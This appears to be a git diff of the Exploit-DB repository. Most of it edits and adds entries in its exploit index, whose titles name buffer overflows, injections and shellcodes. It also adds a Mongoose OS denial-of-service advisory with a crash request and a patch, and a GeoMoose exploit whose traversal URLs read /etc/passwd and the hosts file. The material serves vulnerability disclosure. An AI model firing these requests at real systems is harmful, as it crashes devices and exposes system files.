-22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0
+22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0
-22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0
+22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0
-22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0
+22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0
-22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
+22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote,0
 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0
 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit)",2012-11-01,Metasploit,windows,remote,0
@ -12790,13 +12792,13 @@ id,file,description,date,author,platform,type,port
 22787,platforms/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote,0
 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0
 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote,0
-22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0
+22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0
 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0
 22830,platforms/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0
 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0
 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0
 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0
-22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
+22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0
 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0
@ -13404,7 +13406,7 @@ id,file,description,date,author,platform,type,port
 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0
 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",windows,remote,0
 25167,platforms/windows/remote/25167.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (2)",2005-02-27,class101,windows,remote,0
-25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote .png Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0
+25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0
 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0
 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0
 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0
@ -14037,7 +14039,7 @@ id,file,description,date,author,platform,type,port
 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764
 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0
 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0
-30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
+30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
 30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
 30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0
 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0
@ -15423,6 +15425,7 @@ id,file,description,date,author,platform,type,port
 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
 41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
 41825,platforms/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16055,6 +16058,7 @@ id,file,description,date,author,platform,type,port
 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0
 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0
 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -16249,7 +16253,7 @@ id,file,description,date,author,platform,type,port
 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0
 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0
 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0
-1340,platforms/php/webapps/1340.php,"eFiction 2.0 - 'Fake .gif' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0
+1340,platforms/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0
 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0
 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0
@ -17028,7 +17032,7 @@ id,file,description,date,author,platform,type,port
 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - File Inclusion",2006-10-13,bd0rk,php,webapps,0
 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0
-2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
+2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0
 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0
@ -24763,8 +24767,8 @@ id,file,description,date,author,platform,type,port
 41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0
 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
 41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0
-41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
+41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
-41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0
+41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0
 41799,platforms/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
 41800,platforms/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0
@ -25230,7 +25234,7 @@ id,file,description,date,author,platform,type,port
 17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0
 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
-17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
+17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",windows,webapps,0
 17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,php,webapps,0
 17887,platforms/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0
@ -25510,7 +25514,7 @@ id,file,description,date,author,platform,type,port
 18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0
 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0
 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0
-18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0
+18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0
 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,php,webapps,0
 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file Parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0
 18526,platforms/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps,0
@ -35290,7 +35294,7 @@ id,file,description,date,author,platform,type,port
 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0
 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0
 36924,platforms/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0
-36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (Via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
+36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
 36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0
 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
@ -36817,7 +36821,7 @@ id,file,description,date,author,platform,type,port
 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0
-39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80
+39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File",2016-05-18,agix,php,webapps,80
 39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0
 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
 39848,platforms/php/webapps/39848.py,"WordPress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
@ -36939,7 +36943,7 @@ id,file,description,date,author,platform,type,port
 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
-40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80
+40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80
@ -37694,3 +37698,6 @@ id,file,description,date,author,platform,type,port
 41819,platforms/php/webapps/41819.txt,"Sweepstakes Pro Software - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
 41820,platforms/php/webapps/41820.txt,"Appointment Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0
 41821,platforms/hardware/webapps/41821.txt,"D-Link DIR-615 - Cross-Site Request Forgery",2017-04-05,"Pratik S. Shah",hardware,webapps,0
 41822,platforms/php/webapps/41822.txt,"GeoMoose < 2.9.2 - Directory Traversal",2017-04-03,"Sander Ferdinand",php,webapps,0
 41828,platforms/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",php,webapps,0
 41824,platforms/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps,0
--- a/platforms/hardware/dos/41826.txt
+++ b/platforms/hardware/dos/41826.txt
@ -0,0 +1,208 @@
 #############################################################
 #
 # COMPASS SECURITY ADVISORY
 # https://www.compass-security.com/en/research/advisories/
 #
 #############################################################
 #
 # Product: Mongoose OS
 # Vendor: Cesanta
 # CVE ID: CVE-2017-7185
 # CSNC ID: CSNC-2017-003
 # Subject: Use-after-free / Denial of Service
 # Risk: Medium
 # Effect: Remotely exploitable
 # Authors:
 # Philipp Promeuschel <philipp.promeuschel@compass-security.com>
 # Carel van Rooyen <carel.vanrooyen@compass-security.com>
 # Stephan Sekula <stephan.sekula@compass-security.com>
 # Date: 2017-04-03
 #
 #############################################################
 Introduction:
 -------------
 Cesanta's Mongoose OS [1] - an open source operating system for the Internet of Things. Supported micro controllers:
 * ESP32
 * ESP8266
 * STM32
 * TI CC3200
 Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS).
 Affected versions:
 ---------
 Vulnerable:
 * <= Release 1.2
 Not vulnerable:
 * Patched in current dev / master branch
 Not tested:
 * N/A
 Technical Description
 ---------------------
 The handling of HTTP-Multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server.
 This leads to a use-after-free/null-pointer-de-reference vulnerability, causing the Mongoose HTTP server to crash. As a result, the entire system is rendered unusable.
 The mg_parse_multipart [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is called:
 --------------->8---------------
 void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) {
 [CUT BY COMPASS]
 #if MG_ENABLE_HTTP_STREAMING_MULTIPART
     if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL &&
         s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) {
      mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary
      // however, the socket is not closed, and mg_http_multipart_continue() is executed
      mg_http_multipart_continue(nc);
      return;
 }
 ---------------8<---------------
 In the mg_http_multipart_begin function, the boundary is correctly verified:
 --------------->8---------------
  boundary_len =
      mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary));
  if (boundary_len == 0) {
    /*
     * Content type is multipart, but there is no boundary,
     * probably malformed request
     */
    nc->flags = MG_F_CLOSE_IMMEDIATELY;
    DBG(("invalid request"));
    goto exit_mp;
  }
 ---------------8<---------------
 However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed.
 In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed:
 ---------------8<---------------
 static void mg_http_multipart_continue(struct mg_connection *c) {
  struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
  while (1) {
    switch (pd->mp_stream.state) {
      case MPS_BEGIN: {
        pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY;
        break;
      }
      case MPS_WAITING_FOR_BOUNDARY: {
        if (mg_http_multipart_wait_for_boundary(c) == 0) {
          return;
        }
        break;
      }
 --------------->8---------------
 Then, mg_http_multipart_wait_for_boundary() tries to identify the boundary-string. However, this string has never been initialized, which causes c_strnstr to crash.
 ---------------8<---------------
 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
  const char *boundary;
  struct mbuf *io = &c->recv_mbuf;
  struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
  if ((int) io->len < pd->mp_stream.boundary_len + 2) {
    return 0;
  }
  boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
  if (boundary != NULL) {
 [CUT BY COMPASS]
 --------------->8---------------
 Steps to reproduce
 -----------------
 Request to HTTP server (code running on hardware device):
 ---------------8<---------------
 POST / HTTP/1.1
 Connection: keep-alive
 Content-Type: multipart/form-data;
 Content-Length: 1
 1
 --------------->8---------------
 The above request results in a stack trace on the mongoose console:
 ---------------8<---------------
 Guru Meditation Error of type LoadProhibited occurred on core  0. Exception was unhandled.
 Register dump:
 PC      : 0x400014fd  PS      : 0x00060330  A0      : 0x801114b4  A1      : 0x3ffbfcf0 
 A2      : 0x00000000  A3      : 0xfffffffc  A4      : 0x000000ff  A5      : 0x0000ff00 
 A6      : 0x00ff0000  A7      : 0xff000000  A8      : 0x00000000  A9      : 0x00000085 
 A10     : 0xcccccccc  A11     : 0x0ccccccc  A12     : 0x00000001  A13     : 0x00000000 
 A14     : 0x00000037  A15     : 0x3ffbb3cc  SAR     : 0x0000000f  EXCCAUSE: 0x0000001c 
 EXCVADDR: 0x00000000  LBEG    : 0x400014fd  LEND    : 0x4000150d  LCOUNT  : 0xffffffff 
 Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210
 --------------->8---------------
 Further debugging shows that an uninitialized string has indeed been passed to c_strnstr:
 ---------------8<---------------
 (gdb) info symbol 0x401114b4
 c_strnstr + 12 in section .flash.text
 (gdb) list *0x401114b4
 0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720).
 warning: Source file is more recent than executable.
 1715    }
 1716    #endif /* _WIN32 */
 1717   
 1718    /* The simplest O(mn) algorithm. Better implementation are GPLed */
 1719    const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK;
 1720    const char *c_strnstr(const char *s, const char *find, size_t slen) {
 1721      size_t find_length = strlen(find);
 1722      size_t i;
 1723   
 1724      for (i = 0; i < slen; i++) {
 (gdb) list *0x401136cc
 0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893).
 5888      mg_http_free_proto_data_mp_stream(&pd->mp_stream);
 5889      pd->mp_stream.state = MPS_FINISHED;
 5890   
 5891      return 1;
 5892    }
 5893   
 5894    static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
 5895      const char *boundary;
 5896      struct mbuf *io = &c->recv_mbuf;
 5897      struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
 (gdb)
 --------------->8---------------
 Workaround / Fix:
 -----------------
 Apply the following (tested and confirmed) patch:
 ---------------8<---------------
 $ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c
 index 91dc8b9..063f8c6 100644
 --- a/mongoose/mongoose.c
 +++ b/mongoose/mongoose.c
@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
     return 0;
   }
 +  if(pd->mp_stream.boundary == NULL){
 +      pd->mp_stream.state = MPS_FINALIZE;
 +      LOG(LL_INFO, ("invalid request: boundary not initialized"));
 +      return 0;
 +  }
 +
   boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
   if (boundary != NULL) {
     const char *boundary_end = (boundary + pd->mp_stream.boundary_len);
 --------------->8---------------
 The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4]
 Timeline:
 ---------
 2017-04-03: Coordinated public disclosure date
 2017-04-03: Release of patch
 2017-03-20: Initial vendor response, code usage sign-off
 2017-03-19: Initial vendor notification
 2017-03-19: Assigned CVE-2017-7185
 2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen
 2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen
 2017-03-08: Discovery by Philipp Promeuschel
 References:
 -----------
 [1] https://www.cesanta.com/
 [2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760
 [3] http://www.ietf.org/rfc/rfc2046.txt
 [4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b
--- a/platforms/php/webapps/41822.txt
+++ b/platforms/php/webapps/41822.txt
@ -0,0 +1,15 @@
 # Exploit Title: GeoMoose <= 2.9.2 Local File Disclosure
 # Exploit Author: Sander 'dsc' Ferdinand
 # Date: 2017-03-4
 # Version: <= 2.9.2
 # Blog: https://ced.pwned.systems/advisories-geomoose-local-file-disclosure-2-9-2.html
 # Vendor Homepage: geomoose.org
 # Reported: 4-3-2017
 # Vendor response: http://osgeo-org.1560.x6.nabble.com/Geomoose-users-GeoMoose-Security-Issue-td5315873.html
 # Software Link: https://github.com/geomoose/geomoose
 # Tested on: Windows/Linux
 # CVE : none
 /php/download.php?id=foo/.&ext=/../../../../../../../etc/passwd
 /php/download.php?id=foo/.&ext=/../../../../../../../WINDOWS/system32/drivers/etc/hosts
--- a/platforms/php/webapps/41824.txt
+++ b/platforms/php/webapps/41824.txt
@ -0,0 +1,213 @@
